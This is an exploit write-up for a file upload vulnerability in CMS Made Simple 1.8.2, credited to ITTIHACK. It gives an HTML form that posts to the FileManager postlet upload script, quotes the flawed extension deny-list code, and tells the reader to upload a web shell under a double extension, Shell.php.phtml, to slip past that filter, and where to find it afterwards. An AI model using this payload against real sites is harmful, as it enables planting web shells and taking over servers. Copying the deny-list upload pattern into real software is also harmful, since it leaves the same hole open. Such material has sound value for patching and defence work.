############################################################################################################# # Exploit Title: cmsmadesimple-1.8.2 File Upload Vulnerability # # Author: ITTIHACK # # Software Site : http://www.cmsmadesimple.org # # Donload Link: http://s3.amazonaws.com/cmsms/downloads/5953/cmsmadesimple-1.8.2-base.tar.gz # # Version: 1.8.2 # # Category:: webapps # # Tested on: Windows 7 # # Home : http://ittihack.blogspot.com # ############################################################################################################# Proof of Concept: --------------------------------------------------------------------------------------------------------------------------------------------------- 1) file: uploadTest.html <html> <head> <title>Upload Test</title> </head> <body> <p> <form method='POST' enctype='multipart/form-data' action='http://localhost/cmsmadesimple/modules/FileManager/postlet/javaUpload.php'> File to upload: <input type=file name=userfile><br> <input type=submit value=Press> to upload the file! </form> </p> </body> </html> --------------------------------------------------------------------------------------------------------------------------------------------------- 2) File: javaUpload.php $uploaddir = '[PATH TO UPLOAD DIRECTORY]'; <-- here is the path for your shell $allow_or_deny_method = "deny"; // "allow" or "deny" $file_extension_list = array("php","asp","pl"); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name'])) ================================================================================================================================================== - Exploit: http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/uploadTest.html - Upload your shell as Shell.php.phtml - You will find your shell here: - http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/[PATH TO UPLOAD DIRECTORY]Shell.php.phtml =================================================================================================================================================== ./ITTIHACK